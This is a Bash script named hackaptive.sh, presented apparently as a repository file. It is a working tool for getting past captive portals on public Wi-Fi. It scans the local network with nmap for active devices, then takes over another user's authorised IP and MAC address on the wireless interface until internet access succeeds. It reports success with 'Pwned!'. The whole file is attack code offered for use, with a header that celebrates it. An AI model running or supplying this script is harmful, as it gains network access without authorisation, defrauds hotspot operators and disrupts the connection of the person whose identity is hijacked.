125 lines
4.8 KiB
Bash
125 lines
4.8 KiB
Bash
|
#!/usr/bin/env bash
|
||
|
# =========================================================================== #
|
||
|
# FILE: hackaptive.sh #
|
||
|
# USAGE: sudo ./hackaptive.sh #
|
||
|
# #
|
||
|
# DESCRIPTION: This script helps to pass through the captive portals in #
|
||
|
# public Wi-Fi networks. It hijacks IP and MAC from somebody #
|
||
|
# who is already connected and authorized on captive portal. #
|
||
|
# #
|
||
|
# REQUIREMENTS: coreutils, sipcalc, nmap #
|
||
|
# NOTES: Let the information always be free! #
|
||
|
# REVISION: --- #
|
||
|
# LICENSE: GPL v3 #
|
||
|
# =========================================================================== #
|
||
|
|
||
|
# Find the initial parameters of wireless interface.
|
||
|
interface="$(ip -o -4 route show to default | awk '/dev/ {print $5}')"
|
||
|
localip="$(ip -o -4 route get 1 | awk '/src/ {print $7}')"
|
||
|
wifissid="$(iw dev "$interface" link | awk '/SSID/ {print $NF}')"
|
||
|
gateway="$(ip -o -4 route show to default | awk '/via/ {print $3}')"
|
||
|
bridge="$(ip -o -4 addr show dev "$interface" | awk '/brd/ {print $6}')"
|
||
|
ipmask="$(ip -o -4 addr show dev "$interface" | awk '/inet/ {print $4}')"
|
||
|
netmask="$(printf "%s\n" "$ipmask" | cut -d "/" -f 2)"
|
||
|
netaddress="$(sipcalc "$ipmask" | awk '/Network address/ {print $NF}')"
|
||
|
network="$netaddress/$netmask"
|
||
|
macaddress="$(ip -0 addr show dev "$interface" \
|
||
|
| awk '/link/ && /ether/ {print $2}' \
|
||
|
| tr '[:upper:]' '[:lower:]')"
|
||
|
|
||
|
# Check for running as root.
|
||
|
function check_sudo() {
|
||
|
if [[ "$EUID" -ne 0 ]]; then
|
||
|
printf "%b\n" "ERROR This script must be run as root. Use sudo." >&2
|
||
|
exit 1
|
||
|
fi
|
||
|
}
|
||
|
|
||
|
# Create a temporary folder for script work.
|
||
|
function create_tmp() {
|
||
|
unset tmp
|
||
|
tmp="$(mktemp -q -d "${TMPDIR:-/tmp}/hackaptive_XXXXXXXXXX")" || {
|
||
|
printf "%b\n" "ERROR Unable to create temporary folder. Abort." >&2
|
||
|
exit 1
|
||
|
}
|
||
|
}
|
||
|
|
||
|
# Clean tmp/ on exit due to any reason.
|
||
|
function clean_up() {
|
||
|
rm -rf "$tmp"
|
||
|
trap 0
|
||
|
exit
|
||
|
}
|
||
|
|
||
|
# Split up big networks into smaller chunks of /24.
|
||
|
function calc_network() {
|
||
|
printf "%b\n" "Exploring network in \"$wifissid\" Wi-Fi hotspot."
|
||
|
if [[ "$netmask" -lt 24 ]]; then
|
||
|
sipcalc -s 24 "$network" \
|
||
|
| awk '/Network/ {print $3}' > "$tmp"/networklist.$$.txt
|
||
|
printf "%b\n" "Splitting up network $network into smaller chunks."
|
||
|
else
|
||
|
printf "%s\n" "$network" | cut -d "/" -f 1 > "$tmp"/networklist.$$.txt
|
||
|
fi
|
||
|
}
|
||
|
|
||
|
# Select network, set netmask, scan it for IP and MAC and hijack them. Repeat.
|
||
|
function main() {
|
||
|
while read -r networkfromlist; do
|
||
|
if [[ "$netmask" -lt 24 ]]; then
|
||
|
network="$networkfromlist/24"
|
||
|
else
|
||
|
network="$networkfromlist/$netmask"
|
||
|
fi
|
||
|
|
||
|
# Scan selected network for active hosts.
|
||
|
printf "%b\n" "Looking for active hosts in $network. Please wait."
|
||
|
nmap -n -sn -PR -PS -PA -PU -T5 --exclude "$localip","$gateway" "$network" \
|
||
|
| awk '/for/ {print $5} ; /Address/ {print $3}' \
|
||
|
| sed '$!N;s/\n/ - /' > "$tmp"/hostsalive.$$.txt
|
||
|
|
||
|
# Set founded IP and MAC for wireless interface.
|
||
|
while read -r hostline; do
|
||
|
newipset="$(printf "%s\n" "$hostline" | awk '{print $1}')"
|
||
|
newmacset="$(printf "%s\n" "$hostline" \
|
||
|
| awk '{print $3}' \
|
||
|
| tr '[:upper:]' '[:lower:]')"
|
||
|
printf "%b\n" "Trying to hijack $newipset - $newmacset"
|
||
|
ip link set "$interface" down
|
||
|
ip link set dev "$interface" address "$newmacset"
|
||
|
ip link set "$interface" up
|
||
|
ip addr flush dev "$interface"
|
||
|
ip addr add "$newipset/$netmask" broadcast "$bridge" dev "$interface"
|
||
|
ip route add default via "$gateway"
|
||
|
sleep 1
|
||
|
|
||
|
# Check if Google DNS pingable with our new IP and MAC.
|
||
|
ping -c1 -w1 8.8.8.8 >/dev/null
|
||
|
if [[ $? -eq 0 ]]; then
|
||
|
printf "%b\n" "Pwned! Now you can surf the Internet!"
|
||
|
exit 0
|
||
|
fi
|
||
|
done < "$tmp"/hostsalive.$$.txt
|
||
|
rm -rf "$tmp"/hostsalive.$$.txt
|
||
|
printf "%b\n" "Suitable hosts not found. Checking another network chunk."
|
||
|
|
||
|
done < "$tmp"/networklist.$$.txt
|
||
|
rm -rf "$tmp"/networklist.$$.txt
|
||
|
printf "%b\n" "No luck! Try again later or try another Wi-Fi hotspot."
|
||
|
|
||
|
# Restore original MAC and IP.
|
||
|
ip link set "$interface" down
|
||
|
ip link set dev "$interface" address "$macaddress"
|
||
|
ip link set "$interface" up
|
||
|
ip addr flush dev "$interface"
|
||
|
ip addr add "$ipmask" broadcast "$bridge" dev "$interface"
|
||
|
ip route add default via "$gateway"
|
||
|
}
|
||
|
|
||
|
# Functions start here.
|
||
|
trap clean_up 0 1 2 3 15
|
||
|
check_sudo
|
||
|
create_tmp
|
||
|
calc_network
|
||
|
main
|